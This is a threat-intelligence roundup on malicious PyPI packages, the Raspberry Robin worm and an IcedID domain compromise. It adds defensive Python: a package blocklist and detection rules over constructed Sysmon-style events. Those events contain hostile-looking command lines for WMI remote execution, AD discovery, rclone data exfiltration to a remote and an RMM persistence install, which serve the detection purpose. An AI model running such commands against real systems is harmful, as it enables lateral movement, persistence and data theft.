CTI Roundup: Malicious PyPI Packages Bypass Firewalls
PyPI packages use Cloudflare tunnels to bypass firewalls, new Raspberry Robin malware variant targets financial institutions in Portugal and Spain, and IcedID malware strikes again
In this week’s Roundup, CTI kicks off with an investigation into the discovery of six malicious packages on the Python Package Index (PyPI). Next up is a deep dive into recent reporting on the wormable Raspberry Robin malware framework, which is exhibiting significant improvements in functionality and appears to be following a new targeting pattern, as evidenced by its victimization of financial and insurance institutions in Europe. The Roundup wraps things up with CTI’s examination of a recent IcedID malware attack, in which the threat actor achieved Active Directory/domain compromise less than 24 hours after gaining initial access.
1. Malicious PyPI packages use Cloudflare tunnels to sneak through firewalls
Phylum has discovered six malicious packages on the Python Package Index (PyPI), which is Python’s official third-party software repository. The packages were found to be installing remote access trojan (RAT) and information-stealing malware, while also using Cloudflare Tunnel to bypass firewall restrictions for remote access.
How the discovery unfolded
Phylum first flagged a package called pyrologin on December 22, 2022. At first glance, this package appeared to be standard Python malware aside from the fetching of a zip file and some strings containing PowerShell code. Then on December 28, they discovered a similar malicious package called easytimestamp. The next day, discorder and discord-dev were discovered, again with similarities to the original pyrologin. And finally, on December 31, researchers discovered style[.]py and pythonstyles – both of which were similar to the original discoveries.
The discovery of this and many similar malicious packages suggests this was not a one-off publication, but rather part of a larger attack.
The six malicious packages detected by Phylum have multiple downloads and have since been removed from PyPI:
- pyrologin – 165 downloads
- easytimestamp – 141 downloads
- discorder – 83 downloads
- discord-dev – 228 downloads
- style.py – 193 downloads
- pythonstyles – 130 downloads
Installing one of these malicious packages may lead to the following scenarios:
- The exfiltration of sensitive information
- Established persistence
- Installation of a keystroke logger
- Installation of a Cloudflare tunnel
- Initiation of a flask app, which is accessed by the attacker via the above tunnel
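A defender's first check against this story is whether any of the six names above appear in a project's requirements or an installed environment. The example below is added here and is not Phylum's or PyPI's code; it normalizes names the way PyPI does (PEP 503), so spellings such as `Discord_Dev` or `style.py` are not missed, and the requirements file it scans is a constructed sample.

```python
import re
from importlib.metadata import distributions
from typing import List, Optional, Tuple

# The six package names from the Phylum report, as listed above.
MALICIOUS_PACKAGES = {"pyrologin", "easytimestamp", "discorder",
                      "discord-dev", "style.py", "pythonstyles"}

def normalize(name: str) -> str:
    """PEP 503 name normalization: lowercase, with runs of '-', '_' and '.' folded to '-'.
    Without this, 'Style_Py' or 'discord.dev' would slip past a plain string compare."""
    return re.sub(r"[-_.]+", "-", name).lower()

BLOCKLIST = {normalize(n) for n in MALICIOUS_PACKAGES}

# A requirement line starts with the project name; extras, specifiers, markers and comments follow.
_NAME_RE = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)")

def requirement_name(line: str) -> Optional[str]:
    """Return the normalized project name on a requirements.txt line, or None."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith(("-", "http://", "https://", "git+")):
        return None  # pip options (-r, -e) and direct URLs carry no bare name here
    match = _NAME_RE.match(line)
    return normalize(match.group(1)) if match else None

def find_blocked(requirements_text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, original line, normalized name) for every blocked requirement."""
    hits = []
    for lineno, line in enumerate(requirements_text.splitlines(), 1):
        name = requirement_name(line)
        if name in BLOCKLIST:
            hits.append((lineno, line.strip(), name))
    return hits

def installed_blocked() -> List[str]:
    """Normalized names of blocked packages present in the running interpreter's site-packages."""
    names = {normalize(d.metadata.get("Name") or "") for d in distributions()}
    return sorted(names & BLOCKLIST)

# Constructed sample file (hypothetical); two lines match after normalization.
SAMPLE_REQUIREMENTS = """\
# constructed sample requirements file
requests>=2.28
Discord_Dev==0.1.0   # matches discord-dev once normalized
style.py
-r extra-requirements.txt
numpy ; python_version < "3.12"
"""
```

Run `find_blocked` over each requirements file in CI and `installed_blocked()` on build hosts; a non-empty result means the package must be removed and the host treated as compromised, since the stealer runs at install time.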
Why you should care
This malware is like “a RAT on steroids,” according to Phylum. It encompasses basic RAT capabilities built into a web GUI, with a remote desktop capability and stealer.
So, even if an attacker fails to establish persistence, or fails to get a remote desktop utility to work, the stealer portion will still exfiltrate the data it finds.
Analyst comments from Tanium’s Cyber Threat Intelligence Team
“Phylum’s findings are another example of how attackers are targeting open-source package repositories to stage supply chain style attacks, something that is likely to continue in the future.”
“What makes this instance more unique compared to some of the previously identified malicious open-source packages is the use of the legitimate Cloudflare Tunnel software to remotely access the compromised machine. Cloudflare Tunnel lets you secure and encrypt traffic to any kind of infrastructure without a publicly routable IP address and allows web servers to become publicly available through Cloudflare without configuring firewalls.”
“Phylum’s analysis is deeply technical and contains much more detail than outlined above if you are interested.”
2. New Raspberry Robin malware targets financial institutions in Portugal and Spain
Hackers are now leveraging the automated, “wormable” malware framework known as Raspberry Robin to target Spanish and Portuguese financial and insurance institutions.
This worm acts as a loader for other malware, and spreads to other devices within victim networks. According to Security Joes, Raspberry Robin is a “well-designed automated framework” that “allows attackers post-infection capabilities to evade detection, move laterally and leverage trusted cloud infrastructures of known data hosting providers such as Discord, Azure & Github…”
A look back at Raspberry Robin
CTI has been tracking Raspberry Robin since July 2022. Our research led us to a thorough analysis of the malware from Red Canary, which first observed the associated malicious activity cluster in September 2021.
At the time, the malware was described as a worm that is often installed via USB drive. Victimology included organizations with ties to technology and manufacturing. That same month, Microsoft tied Raspberry Robin to the notorious Russian cybercrime syndicate known as Evil Corp.
The latest on Raspberry Robin
According to The Record, Raspberry Robin still infects computers via compromised USB devices, so not much has changed with regard to the framework’s initial intrusion vector. However, Security Joes reports that the latest variant of the malware is more complex than previous iterations, which allows its operators to collect much more data from its targets.
The researchers from Security Joes go on to state that Raspberry Robin’s uniqueness lies in its heavy obfuscation and the difficulty involved in any attempts to statically disassemble the malware.
“It seems that developers were busy adding protections to their code to avoid security tools and the curious eyes of malware analysts,” the report says.
Its developers also apparently added another layer of encryption, so victim data is no longer viewable in plain text but is instead encrypted with the RC4 cipher. The researchers were undeterred, however: in the two cases to which they responded this month, the analysts were able to “dissect the downloader from its parent wrapper and unveil the malware which pointed to the aforementioned Raspberry Robin framework.”
Analyst comments from Tanium’s Cyber Threat Intelligence Team
“The Raspberry Robin worm is an active part of a complex malware ecosystem, and its list of victims is becoming increasingly diverse. Its framework has been used to target organizations all over the world, enabling intrusions into networks belonging to entities with ties to technology, manufacturing, telecoms, government, and now finance and insurance.”
“According to Microsoft, in October 2022 alone, nearly 3,000 devices in almost 1,000 organizations received at least one Raspberry Robin payload-related alert. Taking all this into account — as well as the fact that it seems to be under constant development and subjected to frequent updates — Raspberry Robin has clearly become a world-class threat.”
“‘While Raspberry Robin seemed to have no purpose when it was first discovered, it has evolved and is heading towards providing a potentially devastating impact on environments where it’s still installed,’ says a Microsoft Security Threat Intelligence report from October.”
“Raspberry Robin’s development will most likely continue well into 2023, and the framework will undoubtedly aid in facilitating further malware distribution and cybercrime activity.”
3. IcedID malware strikes again: Active Directory domain compromised in under 24 hours
IcedID malware, also sometimes referred to as BokBot, has been around since at least 2017. It is historically known to be a banking trojan used to steal financial information from its victims. More recently, IcedID is being leveraged as a dropper for other malware families and as a tool for initial access brokers.
A recent Cybereason threat analysis dives into an IcedID malware attack, which enabled the threat actor to compromise the Active Directory domain of its target in under 24 hours after gaining initial access.
Attack details
Cybereason’s report breaks down the infection methods employed on the patient-zero machine, which the attackers then used as a pivot for the rest of the attack.
At a high level, the victim opens an archive, clicks an ISO file which creates a virtual disk, clicks on an LNK file which drops a DLL, the DLL creates connections to IcedID domains, and the IcedID payload is loaded into the process.
Previously observed IcedID infections begin with the victim opening a password-protected zip file containing an ISO file. When the ISO is double-clicked, it mounts as a read-only directory containing a hidden folder and an LNK file. The hidden folder holds an obfuscated batch file and a DLL payload.
When the shortcut or LNK file is clicked, it will execute the batch file contained in the hidden directory. The batch file will call an executable to copy and drop the DLL into the temp directory where it will be executed.
Technical details
Lateral movement: The attacker followed a standard lateral movement process. They first pivoted to another machine less than an hour after the initial infection, using ping[.]exe to check whether the host was online. Wmic[.]exe was then used to execute a remote DLL on the workstation.
Once established on the remote host, the attacker executed a Cobalt Strike beacon named gv[.]dll. This process was repeated throughout the network: ping[.]exe to confirm hosts were online, WMI to move laterally, and Cobalt Strike payloads to gain a foothold. Cybereason observed the attacker moving laterally to an internal Windows Server using credentials compromised via kerberoasting; the account had domain admin privileges.
Persistence: The attacker borrowed a technique from Conti, installing the AteraAgent RMM tool on multiple machines. Atera is a legitimate remote administration tool that the Conti gang used to regain persistent access to infected environments and avoid detection. Atera gives the attacker an additional backdoor in case their initial persistence mechanisms are discovered and/or remediated. The command lines executed during the installation of the AteraAgent reveal a mistake made by the attacker — the misspelling of the outlook[.]it domain.
Credential theft: The first instance of credential theft occurred only 15 minutes after the initial infection via kerberoasting. Kerberoasting was used to pull the hashes of service accounts on the domain. After moving laterally to a file server and elevating privileges via services, the attacker then successfully executed a DCSync attack — an attack that allows the threat actor to impersonate a domain controller, requesting password hashes from other domain controllers. This allowed the attacker to ultimately compromise the domain.
Browser hooking: IcedID has a history of attempting to hook into browsers like Firefox or Chrome to try to steal credentials and cookies. Once the main bot was loaded, researchers observed hooking behavior within Chrome.
Discovery: The attack leveraged multiple discovery commands that were executed as part of the “SysInfo” module of the IcedID bot. Net[.]exe was used to discover OS and AD information, and ping[.]exe was used to discover whether remote machines were online for lateral movement.
The attacker also used nltest[.]exe to extract AD information and PowerShell to find non-standard shares within the network. Lastly, the command “wuauclt.exe /detectnow” was executed to check for any missing updates and patches.
Network scanning: The legitimate netscan tool was leveraged to scan the network, writing the results of the scan to a local xml file. This is yet another technique that was borrowed from Conti.
Data exfiltration: The attacker was observed using renamed copies of the popular rclone file syncing software to encrypt and sync directories to the Mega file-sharing service. Rclone is becoming increasingly popular amongst threat actors, with even LockBit using it for data exfiltration.
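Several of the behaviours above are visible in process-creation telemetry. The example below is added here and is not Cybereason's or Tanium's code: it runs a handful of detection rules over constructed Sysmon-style events (field names follow Sysmon Event ID 1; hosts, paths and command lines are hypothetical) for WMI remote execution, nltest discovery, the `wuauclt.exe /detectnow` patch check, a renamed rclone binary spotted via `OriginalFileName`, and an AteraAgent install.

```python
from typing import Dict, List, Tuple

# Constructed Sysmon-style process-creation events (hypothetical hosts and paths),
# modelled on the tradecraft in the Cybereason report; not real log data.
EVENTS: List[Dict[str, str]] = [
    {"host": "WS01", "Image": r"C:\Windows\System32\PING.EXE", "OriginalFileName": "ping.exe",
     "CommandLine": "ping -n 1 WS02"},
    {"host": "WS01", "Image": r"C:\Windows\System32\wbem\WMIC.exe", "OriginalFileName": "wmic.exe",
     "CommandLine": r'wmic /node:"WS02" process call create "rundll32 C:\Users\Public\gv.dll"'},
    {"host": "WS02", "Image": r"C:\Windows\System32\nltest.exe", "OriginalFileName": "nltest.exe",
     "CommandLine": "nltest /domain_trusts"},
    {"host": "WS02", "Image": r"C:\Windows\System32\wuauclt.exe", "OriginalFileName": "wuauclt.exe",
     "CommandLine": "wuauclt.exe /detectnow"},
    {"host": "FS01", "Image": r"C:\ProgramData\svchost.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r"svchost.exe copy D:\Shares\Finance remote:backup"},
    {"host": "FS01", "Image": r"C:\Windows\System32\msiexec.exe", "OriginalFileName": "msiexec.exe",
     "CommandLine": "msiexec /i AteraAgent.msi /qn"},
]

def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (Sysmon records Image as a full path)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev: Dict[str, str]) -> List[str]:
    """Return the detection labels that fire for one process-creation event."""
    exe = basename(ev["Image"])
    cmd = ev["CommandLine"].lower()
    original = ev.get("OriginalFileName", "").lower()
    labels = []
    if exe == "wmic.exe" and "/node:" in cmd and "process call create" in cmd:
        labels.append("wmic_remote_process_create")  # lateral movement via WMI
    if exe == "nltest.exe":
        labels.append("nltest_ad_discovery")
    if exe == "wuauclt.exe" and "/detectnow" in cmd:
        labels.append("wuauclt_patch_check")  # patch-state discovery
    if original == "rclone.exe" and exe != original:
        labels.append("renamed_rclone")  # PE version info betrays the masquerade
    if "ateraagent" in cmd:
        labels.append("atera_agent_install")  # RMM tool dropped for backup persistence
    return labels

def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """(host, label) pairs for every rule that fires, in event order."""
    return [(ev["host"], label) for ev in events for label in classify(ev)]

def hosts_with_lateral_movement(events: List[Dict[str, str]]) -> List[str]:
    """Hosts from which a WMI remote process creation was launched."""
    return sorted({h for h, label in detect(events) if label == "wmic_remote_process_create"})
```

Plain `ping` is deliberately not a rule on its own; it only becomes interesting when it precedes WMI execution from the same host, which is the correlation an analyst would add on top of these labels.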
Analyst comments from Tanium’s Cyber Threat Intelligence Team
“The ability of an attacker to compromise Active Directory in 24 hours is not entirely unheard of but does serve as a reminder of how quickly incidents can happen and how important it is to react to anomalous network activity in a timely manner. This attack also reiterates how common it is for threat actors and ransomware gangs to reuse/share (or, in some cases, simply steal) TTPs from each other, as evidenced by the threat actor’s repurposing of known Conti techniques, highlighted above.”